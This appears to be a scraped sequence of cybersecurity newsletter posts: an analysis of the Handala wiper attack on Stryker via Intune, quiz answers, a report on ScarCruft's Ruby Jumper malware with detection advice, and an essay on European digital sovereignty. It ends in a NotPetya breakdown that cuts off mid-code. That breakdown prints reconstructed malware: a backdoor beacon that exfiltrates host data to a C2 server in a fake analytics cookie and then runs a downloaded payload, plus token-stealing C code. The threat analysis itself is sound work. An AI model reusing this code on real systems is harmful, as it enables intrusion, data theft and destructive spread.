Stryker makes surgical instruments, orthopedic implants, robotic surgery systems, and hospital equipment used by around 150 million patients a year across 61 countries. It reported $25 billion in revenue last year. This was not a small target hit by accident.

The group claiming responsibility is Handala, assessed by Palo Alto Networks as a front for Void Manticore, a threat actor affiliated with Iran’s Ministry of Intelligence and Security. They said the attack was retaliation for a US missile strike on a girls’ school in Minab, Iran, that killed more than 175 people, most of them children.

The attack vector

Stryker’s statement said there was no ransomware or malware and the incident was contained to its Microsoft environment. That is a careful choice of words. Wiper attacks carried out through a legitimate management platform do not involve malware in the traditional sense but they are still destructive attacks.

Rafe Pilling, Director of Threat Intelligence at Sophos, assessed that Handala likely obtained access to Stryker’s Microsoft Intune console; the MDM platform Stryker uses to manage its global device fleet. Intune has a remote wipe feature built in for lost or stolen devices. Handala appears to have triggered it at scale across enrolled endpoints.

If that holds, the attackers did not need a custom implant or an exploit chain. They needed credentials to the right console. Everything after that was a built-in feature doing what it was designed to do.

Why a wiper is worse than ransomware

With ransomware, there is at least a negotiation. Files are encrypted, not gone, and organisations with working backups can often recover without paying. A wiper has no such dynamic, the data is destroyed and there is nothing to negotiate over. The disruption is the point.

Handala also claimed to have exfiltrated 50 terabytes of data before triggering the wipe. If true, they were collected first and destroyed after, which means Stryker’s recovery does not undo the breach, it just addresses the operational damage.

The patient-facing impact was real. Maryland’s Institute for Emergency Medical Services reported Stryker’s Lifenet ECG transmission system was non-functional across most of the state, pushing paramedics back to verbal radio reports. HHS opened an investigation. Hospitals started evaluating whether to disconnect Stryker equipment from their networks.

The management plane problem

MDM platforms like Intune exist to give IT teams centralised control over every enrolled device in an organisation push updates, enforce policies, remotely wipe hardware reported lost or stolen. At scale, that means one admin account with the right permissions can affect every endpoint on the tenant simultaneously, with no lateral movement required.

This is not a new attack surface. MDM abuse has come up before in enterprise intrusions. But Stryker is the clearest large-scale example of what it looks like when it is weaponised deliberately, at a global company, during an active geopolitical conflict. The same tooling that makes fleet management efficient is what made 200,000 devices erasable in a single operation.

Who is Handala

Handala emerged in late 2023 targeting Israeli organisations and has been active throughout the Gaza conflict. Palo Alto Networks links it to Void Manticore, a MOIS-affiliated actor, with a history of phishing, data theft, wiper attacks, and psychological operations including officer doxxing and fabricated leak narratives.

The group routinely overstates the scale of its operations, so the 200,000 device figure and 50 TB exfil claim should be treated with some scepticism until independently verified. What is confirmed is that Stryker systems in multiple countries were wiped and showing Handala’s logo, the Wall Street Journal and NBC News both corroborated that much.

Handala also claimed a simultaneous attack on Verifone the same day. Verifone denied any disruption. Worth noting, but the Stryker operation is the one with visible impact.

Context

The US-Israel military campaign against Iran began on February 28, 2026. In the weeks following, Iranian-linked groups were mostly quiet on US targets, Proofpoint tracked only one attempted intrusion, against a US think tank, in that entire period. The Stryker attack is the first significant destructive operation against a US company since the conflict began.

The IRGC this week named US and Israeli-linked banks and economic infrastructure as legitimate targets. State-affiliated Iranian media published a list of US tech firms (Google, Microsoft, Nvidia) framing their regional infrastructure as targets. Those are statements of intent, not confirmed operations. But the Stryker attack shows the capability is there.

Share

Technical summary

Actor: Handala (Void Manticore persona, MOIS-affiliated)

Target: Stryker Corporation (NYSE: SYK), Kalamazoo, Michigan

Date: March 11, 2026

Attack type: Destructive wipe, not ransomware

Claimed scope: 200,000+ systems, servers, mobile devices across 79 countries

Claimed exfil: 50 TB

Suspected vector: Microsoft Intune MDM console (privileged credential access)

No custom malware: Remote wipe issued via native platform functionality

Patient impact: Lifenet ECG system down in Maryland; HHS investigating

Motive: Retaliation for Minab school missile strike (175+ killed)

What this tells us

If the Intune vector is confirmed, this attack did not require much. Stolen credentials, access to the right console, and a feature that ships with the product. Stryker is a $25 billion company with a global security team, and it still ended up with 5,000 people sent home and ECG systems down across Maryland. That gap between the effort required and the damage done is what makes this worth paying attention to beyond the Iran angle.

Every organisation running Microsoft 365 at scale has the same exposure. The Intune console is typically protected like any other admin interface, but the consequences of losing it are closer to losing your entire endpoint fleet than losing a single server. Most security programmes have not caught up to that reality.

Stryker will recover operationally. Devices get re-enrolled, systems get rebuilt. But 50 TB of data, if it was actually taken, is not coming back. Whatever was in there is now with whoever Handala answers to. That part of the incident does not have a remediation plan.

Sources

1. Krebs on Security Iran-Backed Hackers Claim Wiper Attack on Medtech Firm Stryker

2. NBC News Iran appears to have conducted a significant cyberattack against a US company

3. TechCrunch Pro-Iran hacktivist group says it is behind attack on medical tech giant Stryker

4. SecurityWeek MedTech Giant Stryker Crippled by Iran-Linked Hacker Attack

5. IT Security Guru Iran-Linked Hacktivists Claim Destructive Cyberattack on Medtech Firm Stryker

6. CNN Pro-Iran hackers claim cyberattack on major US medical device maker

7. Al Jazeera Iran-linked hackers hit medical giant Stryker in retaliatory cyberattack

8. TIME Iran-Linked Hackers Claim Cyberattack on U.S. Company

Yesterdays answer: DDoS (Distributed Denial of Service)

overwhelms servers with traffic from a botnet.

Yesterdays Answer: SLA (Service Level Agreement)

A formal contract between service provider and a customer that defines the expected level of service including specific metric for uptime, performance targets, and penalties for non-compliance.

Yesterdays answer: Sender’s public key

• The sender signs with their private key (which only they know).

• Anyone can verify that signature using the sender’s public key (which everyone can see).

  Thanks for reading Cyber++! Subscribe for free to receive new posts and support my work.

Yesterdays answer: Data protection.

GDPR stands for General Data Protection Regulation. It is a comprehensive legal framework enacted by the European Union (EU) that governs how the personal data of individuals is collected, processed, and stored.

Subscribe now

Yesterdays answer: Filter

A firewall primarily acts as a filter for network traffic, monitoring and controlling the flow of data according to a set of predetermined security rules.

Subscribe now

Yesterdays answer: Rainbow table attack.

A rainbow table attack uses precomputed tables of hash values to quickly reverse-engineer plaintext passwords from their hashed counterparts.

Subscribe now

Yesterdays answer: Hashing.

Hashing checks data integrity by comparing a newly calculated hash of a file or message against a trusted "original" hash.

Subscribe now

Yesterday’s Answer: Illicit Consent Grant

• An Illicit COnsent Grant involves an attacker creating an Azure AD-registered application and tricking users into granting it permissions to access their data. This grants the attacker persistent access to the organization’s data without needing to compromise user credentials.

  Subscribe now

ScarCruft, the North Korean state-sponsored threat actor also tracked as APT37, has spent years trying to cross that line. Their latest campaign, codenamed Ruby Jumper by Zscaler ThreatLabz, which they discovered in December 2025, represents their most sophisticated attempt yet. It deploys six distinct malware families in a coordinated infection chain, abuses legitimate cloud storage services as a covert command-and-control infrastructure, and uses infected USB drives as a physical data relay to bridge the gap between internet-connected machines and isolated networks.

This is not a theoretical concern. Ruby Jumper appears to have been in active development and deployment for some time, and the tooling it brings to bear is mature, modular, and clearly purpose-built for long-term surveillance of high-value targets.

Who Is ScarCruft?

ScarCruft is a North Korean advanced persistent threat group with a long track record of targeting South Korean government entities, diplomatic organisations, military contractors, and journalists covering North Korean affairs. The group has been active since at least 2012 and is widely believed to operate under the direction of North Korea’s Reconnaissance General Bureau.

Their previous campaigns have demonstrated a consistent interest in long-term surveillance rather than destructive attacks. ScarCruft is a collection operation that requires persistent, quiet access to targets and the ability to exfiltrate intelligence without triggering alarms. That operational philosophy is evident throughout the Ruby Jumper toolset.

The group has a history of abusing legitimate cloud infrastructure for C2. BLUELIGHT, one of their older backdoors, has been active since at least 2021 and has previously been observed using Google Drive, Microsoft OneDrive, pCloud, and BackBlaze to receive commands and upload stolen data. By routing malicious traffic through services that organisations trust and whitelist, ScarCruft makes network-layer detection significantly harder. Ruby Jumper extends this approach by adding Zoho WorkDrive to the roster the first time the group is observed abusing that platform.

The Infection Chain: Six Malware Families in One Campaign

Ruby Jumper is not a single piece of malware. It is a coordinated infection chain with distinct stages, each handled by a different implant. The modular design means that losing one component does not necessarily compromise the entire operation, and it complicates attribution and defensive response.

The chain begins with a malicious LNK file, a Windows shortcut, used as the initial delivery mechanism. When a victim opens the file, it executes a PowerShell command that scans the current directory to locate itself based on file size. This self-referential technique allows the malware to carve multiple embedded payloads from fixed offsets within the LNK file itself, without writing obvious dropper binaries to disk first.

From that single LNK, the following are extracted and executed in sequence: a decoy document, a Windows executable payload, an additional PowerShell script, and a batch file. The decoy document deserves particular attention in at least one observed instance, as it displays an Arabic-language translation of an article from a North Korean newspaper about the Palestine-Israel conflict. This is a classic ScarCruft lure pattern: the document is plausible, topically relevant to a Middle Eastern or diplomatic audience, and designed to keep the victim occupied while the malicious chain executes in the background.

“Most critically, THUMBSBD and VIRUSTASK weaponise removable media to bypass network isolation and infect air-gapped systems.”

-Zscaler ThreatLabz researcher Seongsu Park

Stage One: RESTLEAF and the Zoho WorkDrive C2

The first executable payload to be deployed is RESTLEAF, a Windows implant that is spawned directly in memory and never written to disk as a standalone executable, helping it evade file-based detection. RESTLEAF’s primary function is to establish C2 communications, and it does so using Zoho WorkDrive.

The authentication mechanism is straightforward: RESTLEAF carries a hardcoded Zoho WorkDrive access token. Once authenticated, it polls the WorkDrive for shellcode payloads, downloads them, and executes them via process injection, injecting the shellcode into a legitimate running process to further reduce its forensic footprint. This marks the first documented instance of ScarCruft abusing Zoho WorkDrive infrastructure. The choice is deliberate: Zoho WorkDrive is a legitimate, widely used enterprise cloud storage service, and HTTPS traffic to its domains will blend into normal corporate network activity with minimal chance of triggering alerts.

Stage Two: SNAKEDROPPER and the Ruby Runtime

The shellcode delivered by RESTLEAF loads SNAKEDROPPER, which handles the campaign’s most unusual infrastructure decision: it installs a complete, self-contained Ruby runtime on the victim machine.

Why Ruby? The choice appears deliberate, an act of obfuscation through obscurity. The subsequent malware components, THUMBSBD and VIRUSTASK, are deployed as disguised Ruby files. An endpoint detection tool that flags unknown executables but ignores what appears to be a legitimately installed Ruby environment and its associated .rb files might miss the next stage entirely.

SNAKEDROPPER also establishes persistence via a scheduled task, ensuring the malware survives reboots, and drops the two critical air-gap bridging components: THUMBSBD and VIRUSTASK.

Stage Three: THUMBSBD The Bridge

THUMBSBD is the operational centrepiece of the Ruby Jumper campaign. It is disguised as a Ruby file, monitors for the insertion of removable media (USB drives, external hard disks), and uses them to create a physical relay between the infected internet-connected machine and any air-gapped system that subsequently plugs in the same drive.

When removable media is detected, THUMBSBD creates a hidden folder on the drive and uses it in two directions: it stages operator-issued commands for execution on air-gapped machines, and it stores the output from those commands for exfiltration when the drive is later reconnected to an internet-connected host.

The full capability set of THUMBSBD includes: harvesting system information, downloading secondary payloads from remote servers, exfiltrating files, and executing arbitrary commands. It is also responsible for delivering two further implants: FOOTWINE (the surveillance payload) and the resurrected BLUELIGHT backdoor.

Stage Four: VIRUSTASK The Spreader

VIRUSTASK performs a complementary but distinct function to THUMBSBD. Where THUMBSBD handles command execution and data exfiltration, VIRUSTASK focuses exclusively on propagation; it weaponises removable media to achieve initial access on air-gapped systems that have not yet been infected.

The architectural separation is significant. By dividing propagation from operational command-and-control into two distinct implants, ScarCruft reduces the risk of a single detection event compromising the entire operation. If VIRUSTASK is detected and removed from a USB drive before it reaches an air-gapped target, the existing THUMBSBD infrastructure on internet-connected machines remains intact.

Stage Five: FOOTWINE The Surveillance Payload

FOOTWINE is the implant that does the actual spying. Delivered by THUMBSBD as an encrypted payload with an integrated shellcode launcher, it provides the operator with comprehensive surveillance capabilities: keylogging, audio capture, and video capture.

Unlike the cloud-based C2 used by other components in the chain, FOOTWINE communicates with its own C2 server via a custom binary protocol over TCP, a choice that prioritises reliability and control over the traffic-blending benefits of abusing cloud storage.

The command set supported by FOOTWINE is extensive and worth documenting in full, as it illustrates the breadth of access an operator achieves once FOOTWINE is running on a target:

• sm: Interactive command shell execution

• fm: File and directory manipulation

• gm: Plugin and configuration management

• rm: Windows Registry modification

• pm: Running process enumeration

• dm: Screenshot capture and keystroke logging

• cm: Audio and video surveillance

• s_d: Batch script execution (saves to %TEMP% and runs)

• pxm: Proxy connection setup and bidirectional traffic relay

• [filepath]: Arbitrary DLL loading via filepath

The proxy relay capability (pxm) is particularly notable, as it allows the operator to route traffic through the infected machine, potentially using it as a pivot point into the wider network.

Stage Six: BLUELIGHT Returns

Rounding out the toolset is BLUELIGHT, a ScarCruft backdoor that has been in active use since at least 2021. Its continued deployment in Ruby Jumper demonstrates that ScarCruft recycles proven tooling rather than retiring it, updating supporting infrastructure while keeping reliable implants in rotation.

BLUELIGHT uses legitimate cloud providers such as Google Drive, Microsoft OneDrive, pCloud, and BackBlaze for C2 communications, running arbitrary commands, enumerating file systems, downloading payloads, uploading files, and self-deleting when required. Like the rest of the chain, its use of trusted cloud services is specifically designed to make network-layer detection impractical.

Why This Campaign Matters

The Cloud C2 Problem Has No Easy Fix

The most uncomfortable aspect of Ruby Jumper is that its central evasion strategy, routing C2 traffic through legitimate cloud services, is genuinely difficult to defend against at scale.

Organisations cannot simply block Zoho WorkDrive, Google Drive, OneDrive, pCloud, and BackBlaze. These are services that employees use legitimately every day. Any block would be disruptive and is likely to result in workarounds (personal hotspots, personal devices) that create worse security outcomes than the threat they were trying to address.

The more realistic defensive approaches involve behavioural detection, looking for unusual processes that make HTTPS connections to cloud storage endpoints, particularly those that spawn from PowerShell or inject into other processes and deep packet inspection, where endpoint agents can correlate file-level activity with network activity. Neither is easy nor cheap, and both require mature security tooling that many organisations simply do not have.

Air-Gap Bridging Via USB Is Not New, But It Is Getting More Sophisticated

The USB-based air-gap bridging technique used by THUMBSBD and VIRUSTASK is not novel. Stuxnet, the most famous air-gap attack in history, used a similar approach. Russian APT groups have deployed similar tooling against Ukrainian industrial systems. What is notable about Ruby Jumper is the division of labour between two dedicated implants for this purpose, and the integration of the USB channel into a broader modular framework that includes cloud C2, surveillance, and persistence.

The implication for organisations that rely on air gaps as a security control is sobering: the air gap only holds if physical access to the isolated network is strictly controlled, and if every device that crosses the boundary, USB drives, laptops taken to meetings, maintenance equipment, is treated as potentially hostile. That level of operational security is extremely difficult to maintain in practice.

The Ruby Runtime Trick Is Worth Watching

Installing a full programming language runtime as part of a malware deployment is unusual enough to warrant attention. The technique works because security tooling tends to focus on known malicious executables and suspicious unsigned binaries, not on Ruby interpreter processes running .rb files that were installed by a scheduled task three weeks ago.

If this method proves effective and Ruby Jumper indicates it does, other threat actors are likely to adopt similar variations. Expect to see more campaigns that bootstrap legitimate interpreter environments (Python, Lua, Node.js) to deploy malicious code in a form that blends into developer machines and legitimate software environments.

Detection and Defensive Recommendations

The following indicators and defensive measures are derived from the Zscaler ThreatLabz analysis of Ruby Jumper.

What to Look For

• LNK files arriving via email or downloaded from external sources that spawn PowerShell processes, particularly those that scan their own directory and carve payloads from fixed file offsets

• Unexpected installation of Ruby runtime environments, especially via scheduled tasks or batch scripts

• Processes making HTTPS connections to Zoho WorkDrive, Google Drive, OneDrive, pCloud, or BackBlaze that were not spawned by a known user-facing application

• Hidden directories created on removable media, particularly those containing .bat or .ps1 files

• Scheduled tasks pointing to Ruby .rb files in uncommon directories

• Outbound TCP connections using custom binary protocols from processes that should not be making direct network connections

Defensive Measures

• Enable application whitelisting to prevent unauthorised Ruby (or other interpreter) runtime installations

• Implement USB device control policies that prevent automatic execution from removable media and log all USB insertion events

• Deploy endpoint detection capable of correlating process behaviour with network activity, not just file-level signatures

• For truly sensitive environments, enforce strict removable media controls: all USB drives that cross the air-gap boundary should be scanned on an isolated inspection machine before use

• Monitor for anomalous HTTPS traffic to cloud storage endpoints from non-standard processes, even within otherwise trusted domains

• Review scheduled tasks regularly. Legitimate software rarely installs scheduled tasks that invoke script interpreters without user knowledge

Conclusion

Ruby Jumper is a mature, well-engineered espionage campaign from one of North Korea’s most experienced threat actors. It does not rely on any single novel technique. LNK droppers, cloud C2 abuse, USB bridging, and custom surveillance implants are all established approaches. What makes it significant is the sophistication with which those techniques are combined into a coherent, modular, and resilient framework.

The campaign’s use of Zoho WorkDrive marks a deliberate expansion of ScarCruft’s cloud infrastructure abuse, and the purpose-built separation of THUMBSBD and VIRUSTASK into dedicated exfiltration and propagation components shows a level of operational discipline that should concern defenders protecting sensitive networks.

The air gap is not broken. But Ruby Jumper is a reminder that an air gap is only as strong as the operational security practices surrounding it, and that North Korean intelligence services are investing significant resources in finding gaps in those practices.

Share

Sources

1. APT37 Adds New Capabilities for Air-Gapped Networks — Zscaler ThreatLabz

2. ScarCruft Uses Zoho WorkDrive and USB Malware to Breach Air-Gapped Networks — The Hacker News

3. North Korean Hackers Weaponize Fake Research to Deliver RokRAT Backdoor — The Hacker News

4. North Korea Hackers Using New DOLPHIN Backdoor to Spy on South Korean Targets — The Hacker News

5. NK Hackers Deploy Browser Exploit on Watering Hole Sites to Install BLUELIGHT Malware — The Hacker News

Yesterday’s Answer: SQL parameterization

• SQL parameterization is a technique used to prevent SQL injection attacks, not DDoS attacks.

  Subscribe now

Yesterday’s Answer: Forwarding

• The port is fully operational, sending and receiving all data frames

  Subscribe now

Yesterday’s Answer: Impersonating identity

• Spoofing is a type of cyber attack where a person or program acts as another to gain an illicit advantage or access.

  Subscribe now

Share

That fact was tolerable when Washington was a reliable landlord. It is significantly less tolerable now.

The Trigger: Trump 2.0 and the Weaponisation of Tech

Donald Trump’s return to the White House in January 2025 did more to accelerate Europe’s push for digital sovereignty than a decade of GDPR enforcement ever managed. Within weeks, the administration issued a memorandum framing EU digital regulations (the Digital Services Act, the Digital Markets Act, and digital services taxes) not as legitimate regulatory activity but as “extortion” targeting American companies. By August, Trump was posting direct threats on Truth Social: “I will stand up to Countries that attack our incredible American Tech Companies.”

The message was unambiguous. Europe’s right to regulate its own digital market was, in Washington’s view, negotiable. That realisation landed differently than any abstract argument about sovereignty could.

“Trump’s threats have spurred a European awakening,” researchers from France 24 noted in early 2026, though they were careful to add that similar urgency followed the Snowden revelations in 2013 and dissipated quickly. The question now is whether this time the political will survives the news cycle.

The Legal Architecture of Dependency

The sovereignty problem is not merely political. It is structural and legal. The 2018 US CLOUD Act allows American law enforcement to compel US-based technology companies to hand over user data regardless of where that data is physically stored. A government ministry in Berlin running its operations on Microsoft Azure is, under American law, potentially subject to American jurisdiction. European data protection rules offer no guaranteed shield.

This is the core tension European governments are grappling with: they can pass the world’s most rigorous data privacy legislation (and Europe has) while remaining entirely dependent on infrastructure governed by a foreign legal system with extraterritorial reach.

Estonia has been among the most direct in naming this vulnerability. “While we value our technological partnerships, relying solely on closed, proprietary ‘black box’ solutions creates a strategic vulnerability,” Liisa Pakosta, the country’s minister of justice and digital affairs, told CNBC in February 2026. For Estonia (which shares a border with Russia and has faced sustained Russian cyberattacks), digital sovereignty is not a trade policy talking point. It is, as Pakosta put it, “a matter of national survival, not just IT policy.”

The EuroStack and the Gaia-X Cautionary Tale

The flagship concept driving Europe’s response is the “EuroStack“: a framework that maps digital technologies into interconnected layers, from semiconductors and cloud infrastructure up through AI and software services, and charts where European alternatives need to be built. The concept was formally articulated by a group of competition economists and policy researchers in early 2025, drawing lessons from a notable prior failure: Gaia-X.

Launched in 2020 as an ambitious Franco-German project to build a federated European cloud ecosystem, Gaia-X became a case study in how easily sovereignty projects are captured. American companies (Microsoft, Google, AWS) lobbied their way into the initiative’s governance structures, framing participation as partnership rather than conflict.

The structural result was predictable. “Once they were inside Gaia-X, the initiative lost its purpose,” argued competition expert Cristina Caffarra, one of the driving forces behind the Eurostack initiative. What remained was a body producing standards documents and certification labels, not a transformed commercial landscape. Standards, it turned out, are not the same as sovereignty.

The lesson the Eurostack proponents draw is sharp: you cannot outsource independence to the entities you are trying to become independent from. What critics now call “sovereignty-washing” (American hyperscalers marketing European-branded versions of their services as genuinely sovereign solutions) is the same dynamic in updated form.

AWS, Google, and Microsoft have all launched EU-specific cloud units in response to growing European anxiety about data residency. Whether legal structures created under American corporate umbrellas provide genuine sovereignty from the CLOUD Act remains legally untested and politically contested.

The Numbers: How Much Would Independence Actually Cost?

The Center for European Policy Analysis (CEPA) ran the calculation in late 2025 and the figure was sobering: full technological independence from American systems would cost an estimated 3.6 trillion euros. The European Commission’s own digital sovereignty agenda (more narrowly scoped) remains one of the bloc’s most significant policy priorities.

Gartner predicted that sovereign cloud spending in Europe would more than triple by 2027, reaching $23 billion. Governments will remain the primary buyers, followed by regulated industries and critical infrastructure operators in energy, utilities, and telecommunications.

CEPA’s analysis argued that complete independence is the wrong goal. Resilient strategic partnerships, redundancy through diversification, and selective capability-building in critical areas (semiconductors, cloud, AI, space) is a more realistic and cost-effective path than attempting to replicate Silicon Valley from scratch. Others, particularly those aligned with the EuroStack initiative, push back on this framing, arguing that “just enough” independence in key areas is precisely the point: not autarky, but enough leverage that a foreign power cannot unilaterally switch off European digital infrastructure.

On the Ground: Citizens and the De-Googling Movement

The debate is not confined to Brussels policy papers. In Germany, the Chaos Computer Club has been running monthly “de-Googling” sessions: community meetings across the country on the first Sunday of each month, designed to walk people through practical alternatives to American services. LibreOffice over Microsoft Word. Mastodon over X. Signal over WhatsApp.

“We want to offer concrete, free and gradual help to get rid of American services,” said Jochim Selzer, one of the club’s spokespersons on digital self-defence. “The idea is to turn a process that can seem tedious and technical into something rather fun and collaborative.”

Research data from Similarweb indicates that interest in European digital services (email, messaging, search engines) has grown measurably since early 2025, correlating with Trump’s return and the subsequent political friction. Whether that interest translates into lasting behavioural change is less certain. Privacy-focused European alternatives exist across most categories: messaging, webmail, search, and office software. Proton, the Swiss-based encrypted email and VPN provider, is among the more widely adopted examples. Their challenge as a class isn't about technical quality. Instead, it's about network effects and marketing budgets that have grown over many decades.

“It’s no fun being on the most perfect social network if nobody else is there,” one digital sovereignty researcher noted. Critical mass matters, and Big Tech spent decades building it.

What Europe Actually Controls: Regulation

Where Europe has genuine leverage is in its regulatory framework. The Digital Markets Act, the Digital Services Act, and the GDPR collectively represent the world’s most consequential digital regulation regime. In April 2025, the European Commission fined both Apple and Meta under the DMA. The EU’s proposed Democracy Shield aims to systematise defences against foreign disinformation operations.

The EU also declared 2025 the European Year of Digital Citizenship Education, a gesture toward the longer-term project of building public understanding and demand for alternatives.

But critics argue that European competition policy over the past two decades, by preventing the formation of European technology champions while American firms achieved monopolistic scale, produced the dependency it is now trying to regulate its way out of. As one analysis put it bluntly, Europeans were lectured by the very Americans who practised it systematically that industrial policy violated market principles. (Noema Magazine)

The Realistic Assessment

Europe’s position in 2026 is paradoxical. It is a global regulatory standard-setter (GDPR and the AI Act have influenced legislation across dozens of jurisdictions), but it owns roughly 4% of global cloud infrastructure. It sets the rules of the game in its own market while playing on an opponent’s pitch.

Complete de-Americanization of European tech is not happening anytime soon. Forrester predicted in late 2025 that no European enterprise would shift entirely from US hyperscalers in 2026. The dependencies are too deep, the switching costs too high, and the European alternatives in AI and frontier cloud infrastructure too nascent.

What is shifting is the political calculus. For the first time, broad coalitions (from Baltic security ministries to German civil society groups to French competition economists) are converging on the view that the status quo is a strategic risk, not just an inconvenience. Whether that convergence produces the sustained institutional investment required to change it, or dissipates as the post-Snowden moment did in 2013, is the open question that will define Europe’s digital future.

The strongest argument against urgency is the one that has prevailed for thirty years: hyperscaler dependency has worked. American cloud infrastructure is reliable, cheap, and technically superior to anything Europe currently offers at scale. Why disrupt an arrangement that functions?

The answer is that it functions under specific conditions. The CLOUD Act means European data on American servers is subject to American law, regardless of GDPR. Trump’s explicit threats to restrict digital services to countries with “discriminatory” tech regulations showed that access can be politicised. And in war-time or sanctions scenarios (ask any Ukrainian institution how much they want their critical systems on infrastructure a foreign government can switch off) the fragility becomes existential. Europe is trying to regulate the digital world while renting the servers it runs on. That arrangement survived a friendly landlord. It may not survive a hostile one.

Sources

• Digital sovereignty: Europe’s declaration of independence? — Atlantic Council

• Europe gets serious about cutting digital umbilical cord with Uncle Sam’s big tech — The Register

• Get over your X: A European plan to escape American technology — ECFR

• Digital sovereignty (3/3): Are European citizens trapped into using US Big Tech? — France 24

• Digital Sovereignty: Can Europe Afford It? — CEPA

• Rethinking EU Digital Policies: From Tech Sovereignty to Tech Citizenship — Carnegie Endowment

• Europe bids for digital sovereignty amid Russia threats, Trump — CNBC

• Reclaiming Europe’s Digital Sovereignty — Noema Magazine

Yesterday’s Answer: IDS (Intrusion Detection System)

• IDS is designed to monitor network traffic for suspicious activity, known as attack patterns (signatures, or policy violations. It acts acts as a passive monitoring system that alerts admins when there is a potential breach.

  Subscribe now

Phase 1: Supply Chain Compromise (Initial Access)

The attackers technically attributed via malware lineage and infrastructure overlap, and formally named by US, UK, Australian, and Canadian intelligence as GRU Sandworm (Unit 74455); no public cryptographic proof has been released — compromised M.E.Doc, a Ukrainian accounting app with ~400,000 customers, and planted a backdoor inside the legitimate updater module (ZvitPublishedObjects.dll) as early as April 2017. It beaconed to a C2 server, received the NotPetya payload, and executed it silently. Exfiltrated org data was hidden in a Cookie header disguised as Google Analytics traffic.

All code blocks below are pseudocode-style reconstructions, logic accurate, primitives incomplete, and non-operational.

# Illustrative reconstruction based on ESET and Cisco Talos analysis
# of ZvitPublishedObjects.dll

import os, subprocess, requests, base64, winreg, sqlite3

def get_org_identifier():
    try:
        conn = sqlite3.connect("C:\\MeDoc\\Data\\medoc.db")
        row = conn.cursor().execute(
            "SELECT edrpou FROM org_settings LIMIT 1"
        ).fetchone()
        return row[0] if row else "unknown"
    except Exception:
        return "unknown"

def get_proxy_config():
    try:
        key = winreg.OpenKey(
            winreg.HKEY_CURRENT_USER,
            r"Software\Microsoft\Windows\CurrentVersion\Internet Settings"
        )
        return winreg.QueryValueEx(key, "ProxyServer")[0]
    except Exception:
        return None

def beacon(c2_host: str):
    host_info = {
        "edrpou": get_org_identifier(),
        "host":   os.environ.get("COMPUTERNAME", ""),
        "domain": os.environ.get("USERDOMAIN", ""),
        "user":   os.environ.get("USERNAME", ""),
    }
    encoded = base64.b64encode(str(host_info).encode()).decode()

    proxy = get_proxy_config()
    proxies = {"http": f"http://{proxy}", "https": f"http://{proxy}"} if proxy else {}

    headers = {
        "User-Agent": "medoc_ua/10.01.175",
        "Cookie": f"_ga={encoded}; _gat=1"  # exfil disguised as GA cookie
    }

    try:
        resp = requests.get(
            f"http://{c2_host}/Index.php",
            headers=headers, proxies=proxies, timeout=10
        )
        if resp.status_code == 200 and len(resp.content) > 512:
            payload_path = os.path.join(
                os.environ.get("WINDIR", "C:\\Windows"), "perfc.dat"
            )
            with open(payload_path, "wb") as f:
                f.write(resp.content)
            subprocess.Popen(
                ["rundll32.exe", payload_path, "#1"],
                creationflags=0x08000000  # CREATE_NO_WINDOW
            )
    except Exception:
        pass  # silent, retries on next update cycle

The victim installed the weapon themselves.

Phase 2: Privilege Escalation and Credential Theft

perfc.dat carried both a 32-bit and 64-bit Mimikatz module as embedded RT_RCDATA resources, written to disk as dllhost.dat and executed. Credentials were piped back to the parent process in memory. It also enumerated all active sessions and duplicated their tokens, letting it impersonate logged-in domain admins without cracking a single hash.

// Illustrative reconstruction based on CrowdStrike and LogRhythm analysis

#include <windows.h>
#include <tlhelp32.h>

BOOL EnableDebugPrivilege() {
    HANDLE hToken;
    TOKEN_PRIVILEGES tp = {0};

    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
        return FALSE;

    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    BOOL result = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
    CloseHandle(hToken);
    return result && (GetLastError() == ERROR_SUCCESS);
}

void HarvestSessionTokens(HANDLE *tokenBuffer, DWORD *tokenCount) {
    *tokenCount = 0;
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap == INVALID_HANDLE_VALUE) return;

    PROCESSENTRY32W pe = { sizeof(pe) };
    if (!Process32FirstW(hSnap, &pe)) { CloseHandle(hSnap); return; }

    do {
        HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pe.th32ProcessID);
        if (!hProc) continue;

        HANDLE hToken;
        if (OpenProcessToken(hProc,
                              TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_IMPERSONATE,
                              &hToken)) {
            DWORD sessionId = 0, dwLen = 0;
            GetTokenInformation(hToken, TokenSessionId,
                                &sessionId, sizeof(DWORD), &dwLen);

            if (sessionId > 0) {  // only elevated/active sessions
                HANDLE hDupToken;
                if (DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL,
                                      SecurityImpersonation, TokenPrimary,
                                      &hDupToken))
                    tokenBuffer[(*tokenCount)++] = hDupToken;
            }
            CloseHandle(hToken);
        }
        CloseHandle(hProc);
    } while (Process32NextW(hSnap, &pe) && *tokenCount < 64);

    CloseHandle(hSnap);
}

// Each harvested token is injected into a suspended thread,
// which then executes the SMB copy + remote execution as that user.
void ImpersonateAndSpread(HANDLE hToken, const char *targetIP) {
    HANDLE hThread = CreateThread(NULL, 0, LateralMovementThread,
                                   (LPVOID)targetIP, CREATE_SUSPENDED, NULL);
    SetThreadToken(&hThread, hToken);
    ResumeThread(hThread);
    WaitForSingleObject(hThread, 30000);
    CloseHandle(hThread);
}

Phase 3: Lateral Movement via EternalBlue and Credential Abuse

Two propagation paths ran simultaneously. The dual-channel design is why even a network at 97% MS17-010 patch coverage got wiped.

Method 1: EternalBlue (CVE-2017-0144)

NotPetya enumerated targets quietly reading the ARP cache and TCP connection table rather than port scanning, then fired EternalBlue at any host with 445 open.

# Illustrative reconstruction based on CrowdStrike and ESET analysis

import ctypes, socket, struct, ipaddress

def get_arp_targets():
    iphlpapi = ctypes.windll.iphlpapi
    buf_size  = ctypes.c_ulong(0)
    iphlpapi.GetIpNetTable(None, ctypes.byref(buf_size), False)
    buf = ctypes.create_string_buffer(buf_size.value)

    if iphlpapi.GetIpNetTable(buf, ctypes.byref(buf_size), False) != 0:
        return []

    num_entries = struct.unpack_from("I", buf.raw, 0)[0]
    targets, offset = [], 4  # skip dwNumEntries

    for _ in range(num_entries):
        # MIB_IPNETROW: 24 bytes, IP addr at offset +16
